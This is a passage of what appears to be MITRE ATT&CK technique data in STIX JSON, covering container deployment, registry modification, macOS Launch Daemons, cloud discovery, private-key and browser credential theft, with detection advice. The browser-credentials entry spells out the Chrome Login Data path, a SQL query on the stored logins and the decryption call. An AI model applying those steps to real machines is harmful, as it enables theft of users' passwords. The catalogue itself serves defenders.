Retrieved March 24, 2016.", "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf"}, {"source_name": "FireEye HIKIT Rootkit Part 2", "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html"}, {"source_name": "Microsoft Unsigned Driver Apr 2017", "description": "Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.", "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test"}, {"source_name": "Microsoft DSE June 2017", "description": "Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.", "url": "https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN"}, {"source_name": "Microsoft TESTSIGNING Feb 2021", "description": "Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.", "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option"}, {"source_name": "Unit42 AcidBox June 2020", "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.", "url": "https://unit42.paloaltonetworks.com/acidbox-rare-malware/"}, {"source_name": "GitHub Turla Driver Loader", "description": "TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.", "url": "https://github.com/hfiref0x/TDL"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:05.576Z", "name": "Denial of View", "description": "Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAn adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. ", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0815", "external_id": "T0815"}, {"source_name": "Corero", "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf"}, {"source_name": "Michael J. Assante and Robert M. Lee", "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297"}, {"source_name": "Tyson Macaulay", "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-11T21:24:42.680Z", "name": "Deploy Container", "description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)\n\nContainers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Pawan Kinger, @kingerpawan, Trend Micro", "Alfredo Oliveira, Trend Micro", "Idan Frimark, Cisco", "Center for Threat-Informed Defense (CTID)", "Magno Logan, @magnologan, Trend Micro", "Ariel Shuper, Cisco", "Vishwas Manral, McAfee", "Yossi Weizman, Azure Defender Research Team", "Joas Antonio dos Santos, @C0d3Cr4zy"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for suspicious or unknown container images and pods in your environment. Deploy logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application pods to detect malicious activity at the cluster level. In Docker, the daemon log provides insight into remote API calls, including those that deploy containers. Logs for management services or applications used to deploy containers other than the native technologies themselves should also be monitored.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Containers"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92", "created": "2021-03-29T16:51:26.020Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1610", "external_id": "T1610"}, {"source_name": "AppSecco Kubernetes Namespace Breakout 2020", "description": "Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout using Insecure Host Path Volume \u2014 Part 1. Retrieved January 16, 2024.", "url": "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216"}, {"source_name": "Aqua Build Images on Hosts", "description": "Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.", "url": "https://blog.aquasec.com/malicious-container-image-docker-container-host"}, {"source_name": "Docker Containers API", "description": "Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021.", "url": "https://docs.docker.com/engine/api/v1.41/#tag/Container"}, {"source_name": "Kubernetes Workload Management", "description": "Kubernetes. (n.d.). Workload Management. Retrieved March 28, 2024.", "url": "https://kubernetes.io/docs/concepts/workloads/controllers/"}, {"source_name": "Kubeflow Pipelines", "description": "The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. Retrieved March 29, 2021.", "url": "https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/"}, {"source_name": "Kubernetes Dashboard", "description": "The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.", "url": "https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "File Deletion", "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Walker Johnson"], "x_mitre_detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Host forensic analysis"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--56fca983-1cf1-4fd1-bda0-5e170a37ab59", "created": "2017-05-31T21:31:17.915Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1107", "external_id": "T1107"}, {"source_name": "Trend Micro APT Attack Tools", "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Private Keys", "description": "Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)\n\nAdversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\\Users\\(username)\\.ssh\\ on Windows.\n\nPrivate keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.\n\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Itzik Kotler, SafeBreach"], "x_mitre_detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--56ff457d-5e39-492b-974c-dfd2b8603ffe", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1145", "external_id": "T1145"}, {"source_name": "Wikipedia Public Key Crypto", "description": "Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.", "url": "https://en.wikipedia.org/wiki/Public-key_cryptography"}, {"source_name": "Kaspersky Careto", "description": "Kaspersky Labs. (2014, February 11). Unveiling \u201cCareto\u201d - The Masked APT. Retrieved July 5, 2017.", "url": "https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf"}, {"source_name": "Palo Alto Prince of Persia", "description": "Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia \u2013 Game Over. Retrieved July 5, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-08-14T19:19:54.148Z", "name": "Modify Registry", "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Bartosz Jerzman", "Travis Smith, Tripwire", "David Lu, Tripwire"], "x_mitre_deprecated": false, "x_mitre_detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host forensic analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", "created": "2017-05-31T21:31:23.587Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1112", "external_id": "T1112"}, {"source_name": "Microsoft Reg", "description": "Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.", "url": "https://technet.microsoft.com/en-us/library/cc732643.aspx"}, {"source_name": "Microsoft Remote", "description": "Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.", "url": "https://technet.microsoft.com/en-us/library/cc754820.aspx"}, {"source_name": "Microsoft 4657 APR 2017", "description": "Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.", "url": "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657"}, {"source_name": "SpectorOps Hiding Reg Jul 2017", "description": "Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.", "url": "https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353"}, {"source_name": "Microsoft Reghide NOV 2006", "description": "Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.", "url": "https://docs.microsoft.com/sysinternals/downloads/reghide"}, {"source_name": "Microsoft RegDelNull July 2016", "description": "Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.", "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull"}, {"source_name": "TrendMicro POWELIKS AUG 2014", "description": "Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Launch Daemon", "description": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)\n\nAdversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)\n\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_detection": "Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.\n\nSome legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)\n\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["root", "Administrator"], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba", "created": "2020-01-17T19:23:15.227Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1543/004", "external_id": "T1543.004"}, {"source_name": "AppleDocs Launch Agent Daemons", "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "launchd Keywords for plists", "description": "Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.", "url": "https://www.real-world-systems.com/docs/launchdPlist.1.html"}, {"source_name": "WireLurker", "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"}, {"source_name": "OSX Malware Detection", "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf"}, {"source_name": "LaunchDaemon Hijacking", "description": "Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.", "url": "https://bradleyjkemp.dev/post/launchdaemon-hijacking/"}, {"source_name": "sentinelone macos persist Jun 2019", "description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.", "url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Cloud Infrastructure Discovery", "description": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket\u2019s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Regina Elwell", "Praetorian", "Isif Ibrahima, Mandiant"], "x_mitre_deprecated": false, "x_mitre_detection": "Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users and enumerations from unknown or malicious IP addresses. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", "created": "2020-08-20T17:51:25.671Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1580", "external_id": "T1580"}, {"source_name": "Expel IO Evil in AWS", "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.", "url": "https://expel.io/blog/finding-evil-in-aws/"}, {"source_name": "AWS Head Bucket", "description": "Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February 14, 2022.", "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html"}, {"source_name": "AWS Get Public Access Block", "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.", "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html"}, {"source_name": "AWS Describe DB Instances", "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.", "url": "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html"}, {"source_name": "Amazon Describe Instance", "description": "Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.", "url": "https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html"}, {"source_name": "Amazon Describe Instances API", "description": "Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.", "url": "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html"}, {"source_name": "Google Compute Instances", "description": "Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.", "url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/list"}, {"source_name": "Mandiant M-Trends 2020", "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020"}, {"source_name": "Microsoft AZ CLI", "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.", "url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest"}, {"source_name": "Malwarebytes OSINT Leaky Buckets - Hioureas", "description": "Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating leaky buckets into your OSINT workflow. Retrieved February 14, 2022.", "url": "https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Credentials from Web Browsers", "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim\u2019s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ryan Benson, Exabeam", "Barry Shteiman, Exabeam", "Sylvain Gil, Exabeam", "RedHuntLabs, @redhuntlabs"], "x_mitre_detection": "Identify web browser files that contain credentials such as Google Chrome\u2019s Login Data database file: AppData\\Local\\Google\\Chrome\\User 